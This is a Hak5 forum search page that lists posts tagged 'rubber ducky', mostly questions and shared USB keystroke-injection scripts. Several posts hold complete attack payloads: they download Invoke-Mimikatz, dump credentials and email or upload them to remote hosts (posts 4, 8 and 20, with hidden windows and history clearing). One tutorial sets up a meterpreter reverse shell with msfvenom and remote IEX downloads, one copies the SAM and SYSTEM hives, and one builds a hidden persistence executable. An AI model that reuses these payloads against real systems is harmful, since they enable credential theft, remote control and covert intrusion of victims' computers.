Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'rubber ducky'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple / Jasager
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • Mark V
    • Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • Mark I, II, III
  • Active Projects
    • Bash Bunny
    • Packet Squirrel
    • Lan Turtle
    • USB Rubber Ducky
    • SDR - Software Defined Radio
    • Community Projects
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Other Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Found 51 results

  1. Ducky NirCMD bin file creation

    Hey All, I am trying to create a bin file with some nircmd commands and I keep getting errors on it. Can anyone advise me on how I am being an idiot. Thanks NW
  2. Bluetooth Rubber Ducky

    Hi guys, I've been playing around trying to create a Bluetooth version of Rubber Ducky working. Not sure how useful that would be, but I'm in the very early stages. Have been experimenting with this beauty: BBC micro:bit Most 11/12 year olds in the UK will have received one of these in school last year. The BBC ran a programme that allowed schools to apply for free micro:bits for all of Year 7 (6th grade). There's a friendly online interface to program them in Python, but you can actually compile C++ for these badboys. They're available for under £15 / $18: http://microbit.org/resellers/, hence making good little gadgets to mess around with for a BT Rubber Ducky. The micro:bit has a few pins available, a USB port, a small bluetooth antenna, it's very small and can be battery powered (or USB powered). On the front there are 15 LED lights and two buttons to play with: You can program the micro:bit to connect via Bluetooth, with little security (no PIN or anything). Then you can use the two buttons to send commands to the computer or smartphone. At the moment, I'm only able to send ASCII commands, so I've been mapping out the special commands in an ASCII/latin table. I haven't yet figured out how to use the Windows key, but I have managed to take a screenshot ("\x8C") and save a file with the name pwned ("\x99,s,pwned,\n"). Sample file available here, just drag and drop it onto your micro:bit, connect to 'ducky' via BT, the left button will take screenshots, the right button will save files. Code is available here, hopefully others will be able to assist with this experiment :).
  3. Hi, Hak5Forums! I'm new here and would like to post some code I wrote for the USB Rubber Ducky that allows you guys to make a RAT (Remote-Administration Tool) with the Ducky. Here is the GitHub Link: https://github.com/untitledusername/duckyRAT GitHub Wiki/Tutorial Link: https://github.com/untitledusername/duckyRAT/wiki Please note, this script doesn't allow webcam access or things of that such (I'm sure you can probably get that somehow using the command line) This script only allows you to run CMD commands on the victim's PC. If you have any questions I'll gladly answer them down below. Edit: I'm working on adding features to take screenshots of victim's desktop, webcam, etc. Thanks everybody, enjoy! - untitled ❤
  4. A question about scripting

    I am trying to add a twist on the 15 second password stealer i robot hack in which it emails the credentials instead of uploading them to a server. This is my code. I changed the email addresses and passwords for security. DELAY 3000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1');$output = Invoke-Mimikatz -DumpCreds; $output > log.txt;" ENTER DELAY 1500 STRING powershell ENTER STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('MyEmail1@gmail.com', 'MyPassword') ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'MyEmail1@gmail.com' ENTER STRING $ReportEmail.To.Add('MyEmail2@gmail.com') ENTER STRING $ReportEmail.Subject = 'PassDump' ENTER STRING $ReportEmail.Body = (Get-Content Log.txt | out-string) ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 2000 STRING exit ENTER DELAY 500 REM Clear the Run history and exit ENTER STRING exit ENTER and in my email in-box all i got was a email that said the words " How do I get it so it actually sends the output of Invoke-Mmikats instead of literally sending the words Invoke-Mimikatz. Thanks in advance.
  5. This is a modified version of MrGray's script to get passwords from a pc (Original). This version doesn't require an extra usb, but it does require a online server hosting a zip with the tools. CODE ------------------------------------------------------- REM Created by BertFast REM Gets passwords and data from pc and emails them DELAY 500 GUI d DELAY 200 GUI r DELAY 300 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 3000 LEFT ENTER DELAY 500 STRING powershell & cd %TEMP%\tools & BrowsingHistoryView.exe /stext logs\BrowsingHistoryView.txt & ChromePass.exe /stext logs\ChromePass.txt & OperaPassView.exe /stext logs\OperaPassView.txt STRING & PasswordFox.exe /stext logs\PasswordFox.txt & SkypeLogView.exe /stext logs\SkypeLogView.txt & WebBrowserPassView.exe /stext logs\WebBrowserPassView.txt & WirelessKeyView.exe /stext logs\WirelessKeyView.txt & powershell -ExecutionPolicy Bypass %TEMP%\tools\file.ps1 STRING & cd %TEMP% & del tools.zip & exit ENTER STRING Add-Type -AssemblyName System.IO.Compression.FileSystem ENTER STRING function Unzip ENTER STRING { ENTER STRING param([string]$zipfile, [string]$outpath) ENTER STRING [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) ENTER STRING } ENTER STRING wget "http://pathtotools.zip/Tools.zip" -OutFile $ENV:temp\tools.zip ENTER STRING Unzip $ENV:temp\tools.zip $ENV:temp ENTER STRING cd $ENV:temp\tools ENTER STRING mkdir logs ENTER STRING exit ENTER Link to the tools: https://www.mediafire.com/file/ddcur1ebc3fbvb5/Tools.zip HOW TO SET IT UP ------------------------------------------------------- Download the Tools.zip file and extract it. Then, open file.ps1 with notepad or whatever program you like and changer "YourUsername" to you username (i.e bertfast) and "YourPassword" to your password. Then change "receiver" to whoever you want to send the logs to. I MADE IT WORK WITH GMAIL. I don't know if it works with other services. After that, zip the Tools folder (don't zip the files or it won't work). In the code above, change "http://pathtotools.zip/Tools.zip" to the path where you have hosted the zip file. Tested in Windows 10 x64. BIG thanks to MrGray for the original script. Also, big thanks to Nurrl. With Duckuino i converted the code above to make it work with my arduino (I don't own a rubber ducky, sorry ) Please tell me if it worked or not and the OS you are using
  6. I bought the USB Rubber Ducky, and it appears that I cannot get it to go into DFU mode. After taking the Micro SD card out, I hold the black button and stick it into my PC, but all I see is a solid red LED on the Ducky. I'm trying to get it to go into DFU mode so I can get Twin Ducks but the DFU mode isn't working. Any help would be greatly appreciated.
  7. No firmware works

    I´m using Windows 10 with Microsoft Visual C++ 2010 Redistributable, Flip (JRE_Flip_Installer_3.4.2.exe) and Atmel Driver (atmel-flip-3.4.2-signed-driver.zip). My "program.bat": @echo off rem setup console title RubberDucky Programming @echo ____________________________________________ @echo [#] RubberDucky Programming Script @echo [-] Programming File: [%1] if "%1"=="" ( goto :bail ) if not exist %1 ( goto :bail ) batchisp -device at32uc3b0256 -hardware usb -operation erase f memory flash blankcheck loadbuffer %1 program verify start reset 0 goto :done :bail @echo [!] Please provide valid input (.hex) file! :done goto :eof When I use "program.bat" with any firmware, I have the following message: Device selection....................... PASS Hardware selection..................... PASS Opening port........................... PASS Reading Bootloader version............. PASS 1.0.2 Erasing................................ PASS Selecting FLASH........................ PASS Blank checking......................... PASS 0x00000 0x3ffff Parsing HEX file....................... PASS ????????.hex WARNING: The user program and the bootloader overlap! Programming memory..................... PASS 0x00000 0x07caf Verifying memory....................... PASS 0x00000 0x07caf Starting Application................... PASS RESET 0 I tried to use with the following firmwares: c_duck_v2.hex c_duck_v2.1.hex c_duck_v2_S001.hex c_duck_v2_S002.hex Composite_Duck_S003.hex duck.hex duck_v2.hex duck_v2.1.hex m_duck.hex m_duck_v2.hex usb.hex USB_v2.hex USB_v2.1.hex Only firmwares "c_duck_v2_S002.hex" and "Composite_Duck_S003.hex" the light blink green. With the others firmwares, the light blink red. With "usb???.hex", the light don´t turn on. Even with the firmwares "c_duck_v2_S002.hex" and "Composite_Duck_S003.hex", the script does not run on either Windows 7 or Windows 10. My script (inject.bin): REM Prints: Hello World! DELAY 10000 STRING Test DELAY 5000 STRING Hello World I tried with the MicroSD card original (128MB format with FAT and FAT32) and with another MicroSD card (64MB format with FAT). Please, I need some help. Thank you.
  8. @ sign instead of "

    This is what the rubber ducky is outputting to my CMD window: Notice that @ signs have been subbed for " marks. I've tried changing the language from GB to US, but that doesn't seem to help either powershell @IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)@ Here's the contents of the file that I pass to ducktools (python.exe ducktools.py -e -l us mimi.txt inject1.bin) to get my inject.bin file Any help would be greatly appreciated! Mimi.txt file contents: REM Title: Invoke mimikatz and send creds to remote server REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt REM STRING mode con:cols=18 lines=1 ENTER REM STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue ENTER STRING exit ENTER
  9. Modify firmware source code

    i want to modify the source code of one of the firmware of rubber ducky project, example write in a .text file inside the memory a number each time i plug the memory in a pc ... but a i am a little lost with the code somebody have experience in this, somebody have been working in this issue thanks and sorry my english i am a latinoamerican
  10. I am planning on buying the USB Rubber Ducky and I was wondering if this is possible. I was wondering if I or someone could make a payload or whatever it's called to remotely control a computer outside the network. Perhaps like VNC. Also if you could teach me how to make it WON from a different network. I would really appreciate if someone says its all possible to do with a rubber ducky alone, and also help me. THANKS!
  11. Hello again friends! Today I will give a tutorial on how to create a payload that executes under 10 seconds and gives you a fully functioning meterpreter shell back to your kali linux machine. This is done under 20 lines of script. It's quite simple and works on any Windows machine with Powershell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin shall we? Step 1: Fire up Kali Linux and open a terminal. And using msfvenom we are going to create a shellcode. Enter this code: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt The first part "msfvenom" indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine, open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080, 4444. They all work. The -f parameter writes the shellcode in powershell format (obviously since we're using powershell). And the last part after the ">" indicates the location where this payload will be saved in. STEP 2: Now we are going to upload the shellcode to github or pastebin (whichever you prefer). Create a github account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on github and then upload the payload you just made (there are tutorials on google for uploading files). You can upload the file a couple different ways. The easiest is just log on github from your kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that! STEP 3: Now the fun part! Time to code the ducky. Copy and Paste my code and change the corresponding lines. DELAY 500 GUI x DELAY 1000 a DELAY 1000 ALT y DELAY 1000 STRING powershell -WindowStyle hidden ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1') ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp') ENTER DELAY 1000 STRING Invoke-Shellcode -Shellcode ($buf) -Force ENTER What is going here in we are calling the windows + x button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up powershell, BUT IT OPENS IT UP HIDDEN. So the actual powershell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After powershell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, the second IEX string, you want replace the last link with whatever the link is to your script is on your github account. Remember the one you uploaded? You want to click on github, the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code. To set up the listener, open up a terminal in Kali. >msfconsole >use exploit/multi/handler >set payload windows/x64/meterpreter/reverse_https >set LHOST XXX (whatever IP you used, which would be your kali machine IP) >set LPORT XXX (whatever port you used) >exploit And there you go! Of course, have your listener before doing the attack. If you have any questions, please comment! this is my first actual tutorial, so feedback is wanted.
  12. !! EDIT !! !! Now updated so it should be very fast and effective !! !! This is a remake of my bashbunny script so it works on the rubberducky too https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber !! Hello everyone! I made this nice script that gives you a lot of information about your victims computer and stores it on the rubberducky if it runs twin duck firmware. for example their ip and public ip Change it as much as you want, but please make me as source since I spent around 15 hours on this It executes in around 6 seconds :) It also finds more information than it did before :) Just drag the files i upload into your rubberducky running twin duck firmware. You can also see the inject.txt in there so you can convert it to the language you want :) The rubberducky also has to have the name DUCKY for this script to work, because the command it runs is searching for a usb with the name DUCKY. Rememeber this only works if you use the twin duck firmware on you rubberducky. :) The information you grab from you victim will be saved inside a folder called Loot. You can either download the files from my github https://github.com/MrSnowMonster/MrSnows-SnowGlobe/tree/master/Tech/Hacking and Pentesting/RubberDucky/Infograbber rubberducky version or download the rar file I uploaded here. :) info.zip
  13. whenever i run a payload that has a string with the '@' symbol, it writes ' " ' instead.... any way around this???
  14. SAM File Copy - Help

    Hey everyone. I have a question. I am looking at the SAM File Grabber on a live system script and I cant seem to get it to work. I plug it in and the screen just goes crazy and then it doesnt copy anything over. Here is the script I am using. REM Modifications by overwraith ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 REM THE NEXT LINE IS WHERE CHANGING THE DIRECTORY REM TO DESIRED DIRECTORY WOULD HAVE GONE. REM CHANGE DIRECTORY 'DUCKY' FLASH DRIVE. STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:) ENTER DELAY 800 STRING cd %DUCKYdrive% DELAY 400 STRING copy con download.vbs ENTER STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/"))) ENTER STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send() ENTER STRING If objXMLHTTP.Status = 200 Then ENTER STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open ENTER STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0 ENTER STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a ENTER STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing ENTER STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing ENTER CTRL z ENTER STRING cscript download.vbs http://xxxxxxxxxxxxxxx/xxx/vssown.vbs ENTER DELAY 800 STRING del download.vbs ENTER DELAY 800 STRING cscript vssown.vbs /start ENTER DELAY 800 STRING cscript vssown.vbs /create ENTER DELAY 800 STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . ENTER DELAY 800 STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . ENTER DELAY 800 STRING cscript vssown.vbs /stop ENTER DELAY 800 STRING del vssown.vbs ENTER STRING exit ENTER REM Make sure to change the DIRECTORY above. I changed STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . to STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . Also the following: STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . to STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . Ducky is the name of the MicroSD Card so would that be correct? I changed STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs to a vbs script provided by LanMaster53 github account. https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs and changed the URL to my site hosting it. What am I missing. It doesnt seem to work or dump any files back on the Rubber Duck. I am running the Twin Duck Firmware.
  15. Buying Duck

    Hi hak5, I'm new here and I wanted to buy the rubber ducky but the problem is that it's not shipped in my country ( Pakistan ) so how can I get one, please help.
  16. I downloaded files from Github ,and installed "atmel flip ",but I don't know how to use this . i also saw a Video ,this showed me something about flashing on windows,but I can't understand that ,why he used cmd to flash firmare ?if I need not to install any applications,just use cmd ? thank you help me.my English is bed
  17. Usb Rubber ducky only opens cmd

    when i plug my USB rubber ducky into the USB slot and push the black button the ducky opens a command prompt and types: or /f % in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d %myd%/duck The USB even types that if i don't have any SD card in the slot. i am running firmware c_duck_us.hex because that is the only one that actually acts like a keyboard if anyone has the factory hex i would appreciate if you send it to me thanks
  18. Hello, first of all sorry if this is the wrong place to post this... I'm a super newbie but I have an exfiltration attack I need to carry out and was hiping you could help out. I don't particularly feel comfortable in betting on a period of time alone with the target computer so I'd rather socially engineer it. I plan to do this by offering to transfer peace offering files off of my USB (likely to be either a rubber ducky or a bash bunny) whilst the payload does its thing. The main problem I'm having is in the size of the files I plan to exfiltrate they are upwards of 10mb and there may be hundreds. In order to cover the time it would take to exfiltrate these files, my "peace offering" also needs to be sizeable. My question is do you think this is possible and also what tool do you think can best carry out this task? Any help welcome!! P.S. My research has lead me to believe that exfiltration isn't possible through wifi pineapple, if this is incorrect please let me me know :)
  19. Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later). What the executable does: - Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user. - Depending on privilege level, either continue execution or attempt to elevate. (- If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y') - Copies itself and required DLL's to the default TEMP directory, and sets all of those files to be hidden. - Creates a hidden Task Scheduler task which runs the executable on each user logon. - Executes encoded Powershell payload. Why smart privilege checking is important: If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear: This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell. Now if a user is part of the admin group then we see a dialog like this: This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use meterpreters 'getsystem' command and we're away! Tutorial: What you'll need: - Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft). - Linux based PC/VM for generating our payload/listening for connections. Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload. - USB Rubber ducky (with Twin Duck or similar firmware installed) - This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it before) Let's start: - On the Kali Linux side of things lets open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'. - You will be presented with various options, hit '1' and then enter. - Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter. - More options, hit '1' and then enter. - Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding) - Give it a port and then say 'yes' when it asks if you want to start the listener. - Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/' - You have just started a webserver on port 80. Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt' You should be faced with this screen: - Select all the text and copy it. - Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file: - Go to the line with the pre-inserted Powershell payload (Line 64): - Replace the text within the double quotes with your payload you got from the web server earlier. - Go to the build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them. - Navigate to the path it gives at the bottom in the console window to find the DLL's and exe file we need. - Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive. - Now we need our ducky payload, here is the code: REM Awesome script DELAY 500 GUI R DELAY 50 STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe" DELAY 50 ENTER DELAY 1500 ALT Y DELAY 1000 STRING exit DELAY 50 ENTER DELAY 50 STRING exit DELAY 50 ENTER - Generate your inject.bin file with an encoder. - Copy the inject.bin to your Ducky's drive and there we have it! Some caveats: - The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script. - Slower PC's may need slightly longer delays in the ducky script, but hey, just experiment until it works! So tell me what you think, feedback is greatly appreciated!
  20. I've optimized the Mr. Robot hack to run faster (regardless of web server response times, latency, etc.) and more covertly. Feel free to use the techniques with other payloads. Once the FE (white/yellow) command prompt closes you can remove the rubber ducky and the script will continue to exfiltrate creds in the background. DELAY 1000 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 2000 ALT y DELAY 1000 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://example.com/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('https://example.com/rx.php',$o)"&exit ENTER
  21. Do I just need move the .bin file to cd card ? How could I write code so that I can let something save to my rubber ducky? thank you so much ?
  22. So I have been working on a script (admittedly for a while, this is my first script) to grab wifi names and passwords off computers and dump them to a text files. So fair I have it working great, it grabs every wireless Internet connection that the computer has ever made and it dumps it straight back to usb within seconds, to grab and go. I just need help with one thing... How to hide the powershell window and is there anyway of making this script better (I already know i can use powershell to sent txt files to servers or through email i just think its easier with such a simple script to dump it straight back to usb)? Here is the Script
  23. Type text from picture

    So is there a way to make rubber ducky convert picture to text from certain part of the screen and then to type it? I don't mind using external programs. By typing text from image I mean just a photo of a document containing only text.
  24. Is this a Vulnerability for ducky?

    So, I'm not sure what to make of this. Maybe it's nothing. My friend was setting up a bunch of dells and noticed this http://www.dell.com/support/home/us/en/04/Drivers/DriversDetails?driverId=5DD13 it looks like just another driver, but HID and BIOS got me wondering. I found this link http://h20564.www2.hp.com/hpsc/swd/public/detail?swItemId=ob_150812_1 that gives a better description. I couldn't find anything online about what BIOS HID commands there could be. Why would the BIOS need access to HID? If it does have access, what keys does it have, and how do computers interpret them? Could this be exploited? I honestly can't find anything else, but I thought I'd post this in case anyone knows what it actually does and can debunk my curiosity.
  25. Just received the brand new bunny, however. From what i can see it does not come with any other keyboard support then US (us.json). Any ATM for full keyboard support like the rubber ducky has? Any simple way of porting the language files from rubber ducky to this? I did take a look at the HID map to try to map my own xxx.json, i failed when it came to multiple key combination resulting in one output key. Any specific method to make this process ALLOT easier?
×